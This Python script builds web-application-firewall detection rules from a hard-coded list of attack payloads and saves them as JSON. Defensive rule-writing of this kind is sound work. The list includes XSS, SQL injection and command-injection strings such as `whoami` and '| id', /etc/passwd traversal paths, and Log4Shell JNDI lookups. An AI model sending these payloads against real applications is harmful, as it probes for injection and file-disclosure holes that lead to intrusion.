get_vulnerability_rules.py
import json
import logging
import re
# Module-level call: this configures the root logger whenever the file is
# imported, not only when it is run as a script.
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
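def generate_vulnerability_rules(output_path):
    """Generate detection rules from a fixed list of vulnerability payloads.

    Each payload becomes one rule whose ``pattern`` is a case-insensitive
    regular expression (``(?i)`` prefix) derived from the payload. The
    payloads are literal strings, so they are passed through ``re.escape``
    before being embedded. Without escaping, several of them are broken as
    regexes: ``| id`` is an alternation with an empty left branch and matches
    every input (and the rule's action is ``block``), while ``$(whoami)`` and
    ``${jndi:...}`` start with an end-of-string anchor and can never match.

    Args:
        output_path: Path of the JSON file the rule list is written to.

    Returns:
        The list of rule dicts that was written to ``output_path``.

    Raises:
        OSError: if ``output_path`` cannot be opened for writing.
    """
    payloads = {
        "xss": {
            "patterns": [
                "<script>alert(1)</script>",
                "<img src=x onerror=alert(1)>",
                "javascript:alert(1)",
                "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",  # base64 encoded script tag
            ],
            "targets": ["ARGS", "BODY", "HEADERS"],
        },
        "sqli": {
            "patterns": [
                "1' OR '1'='1",
                "'; SELECT * FROM users;",
                "\" OR \"1\"=\"1",
                "UNION SELECT 1,2,3;",
            ],
            "targets": ["ARGS", "BODY", "HEADERS"],
        },
        "rce": {
            "patterns": [
                "`whoami`",
                "$(whoami)",
                "; ls -la;",
                "| id",
            ],
            "targets": ["ARGS", "HEADERS"],
        },
        "lfi": {
            "patterns": [
                "../etc/passwd",
                "../../../../etc/passwd",
            ],
            "targets": ["URI"],
        },
        # These are matched literally, so they only fire on the exact
        # "example.com" lookup strings listed here.
        "log4j": {
            "patterns": [
                "${jndi:ldap://example.com/a}",
                "${jndi:rmi://example.com/b}",
                "${jndi:dns://example.com/c}",
            ],
            "targets": ["ARGS", "BODY", "HEADERS"],
        },
    }

    all_rules = []
    # A single counter across all types, so ids run "xss-0".."xss-3", "sqli-4", ...
    rule_counter = 0
    for vuln_type, data in payloads.items():
        for pattern in data["patterns"]:
            all_rules.append(_build_rule(vuln_type, rule_counter, pattern, data["targets"]))
            rule_counter += 1

    logging.info("Generated %d rules from vulnerability payloads.", len(all_rules))
    with open(output_path, "w", encoding="utf-8") as f:
        json.dump(all_rules, f, indent=2)
    logging.info("Saved %d rules to %s", len(all_rules), output_path)
    return all_rules


def _build_rule(vuln_type, rule_number, pattern, targets):
    """Return one rule dict for a single literal payload.

    Args:
        vuln_type: Category key (``"xss"``, ``"sqli"``, ...), used in the id.
        rule_number: Global sequence number used in the id.
        pattern: Literal payload string; escaped before use as a regex.
        targets: Request parts the rule applies to.

    Returns:
        A dict with the rule's id, phase, pattern, targets, severity, action,
        score and description.
    """
    return {
        "id": f"{vuln_type}-{rule_number}",
        "phase": 2,
        # re.escape: the payload is a literal, not a regex (see module docstring above).
        "pattern": f"(?i){re.escape(pattern)}",
        # Copy so rules of the same type do not share one list object.
        "targets": list(targets),
        "severity": "HIGH",
        "action": "block",
        "score": 7,
        "description": f"Detects {vuln_type} attack payload: {pattern}",
    }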
if __name__ == "__main__":
    # Script entry point: write the rule set next to the current working directory.
    output_path = "vulnerability_rules.json"
    generate_vulnerability_rules(output_path=output_path)